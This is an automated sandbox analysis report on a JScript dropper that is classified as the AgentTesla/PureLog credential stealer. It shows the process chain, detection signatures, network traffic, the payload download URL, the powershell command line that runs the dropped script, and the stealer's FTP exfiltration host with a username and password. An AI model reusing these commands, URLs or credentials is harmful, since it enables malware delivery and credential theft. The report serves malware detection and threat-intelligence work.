Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc00290320092.jse

Overview

General Information

Sample name:doc00290320092.jse
Analysis ID:1579018
MD5:a46d0818a4f925c210408c2637ee7810
SHA1:dcdee5e4e5f8caef5740d52fd4444a209c341b8f
SHA256:7fefb7a81a4c7d4a51a9618d9ef69e951604fa3d7b70d9a2728c971591c1af25
Tags:jseuser-lowmal3
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5056 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 1512 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 915A6F3675442C388110FB11DB36620A)
        • RegSvcs.exe (PID: 5212 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "5n0w@jeepcommerce.rs", "Password": "T4+.KUh4a;%v"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 6B 88 44 24 2B 88 44 24 2F B0 59 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 6B 88 44 24 2B 88 44 24 2F B0 59 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Click to see the 21 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.RegSvcs.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 6B 88 44 24 2B 88 44 24 2F B0 59 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        6.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 6B 88 44 24 2B 88 44 24 2F B0 59 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        6.2.RegSvcs.exe.2ed064e.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          6.2.RegSvcs.exe.2ed064e.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            6.2.RegSvcs.exe.2ed064e.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              Click to see the 86 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Initiated Connection to Non-Local Network
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5056, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ProcessId: 5056, ProcessName: wscript.exe
              Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 1512, ParentProcessName: x.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ProcessId: 5212, ProcessName: RegSvcs.exe
              Sigma detected: Script Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5056, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49707
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ProcessId: 5056, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5056, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 1212, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:42:29.915016+010020188561A Network Trojan was detected108.181.20.35443192.168.2.849707TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-20T17:42:29.642551+010028275781A Network Trojan was detected192.168.2.849707108.181.20.35443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1321703
              Found malware configuration
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "5n0w@jeepcommerce.rs", "Password": "T4+.KUh4a;%v"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 35%
              Multi AV Scanner detection for submitted file
              Source: doc00290320092.jseReversingLabs: Detection: 13%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
              Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: x.exe, 00000005.00000003.1720722062.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000005.00000003.1721263258.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,5_2_004339B6
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,5_2_00452492
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00442886
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_004788BD
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,5_2_0045CAFA
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00431A86
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,5_2_0044BD27
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0045DE8F FindFirstFileW,FindClose,5_2_0045DE8F
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_0044BF8B

              Software Vulnerabilities

              barindex
              JavaScript source code contains functionality to generate code involving a shell, file or stream
              Source: doc00290320092.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']Go to definition
              Source: doc00290320092.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']Go to definition
              Source: doc00290320092.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.8:49707 -> 108.181.20.35:443
              Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.8:49707
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
              Yara detected Generic Downloader
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownDNS query: name: ip-api.com
              Source: global trafficHTTP traffic detected: GET /gj7umd.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004422FE InternetQueryDataAvailable,InternetReadFile,5_2_004422FE
              Source: global trafficHTTP traffic detected: GET /gj7umd.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
              Source: RegSvcs.exe, 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
              Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
              Source: wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
              Source: wscript.exe, 00000001.00000003.1770705424.000001B50C974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1775625595.000001B50CDEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771185733.000001B50C97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1769119619.000001B50AADC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1684237324.000001B50C97B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771118890.000001B50AC29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1770705424.000001B50C95F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773587473.000001B50CE0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1770951506.000001B50C97F000.00000004.00000020.00020000.00000000.sdmp, doc00290320092.jseString found in binary or memory: https://files.catbox.moe/gj7umd.ps1
              Source: wscript.exe, 00000001.00000003.1772155185.000001B50AA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774713133.000001B50AA64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gj7umd.ps1:CreateObject
              Source: wscript.exe, 00000001.00000003.1627015912.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773818837.000001B50C95E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/gj7umd.ps1u
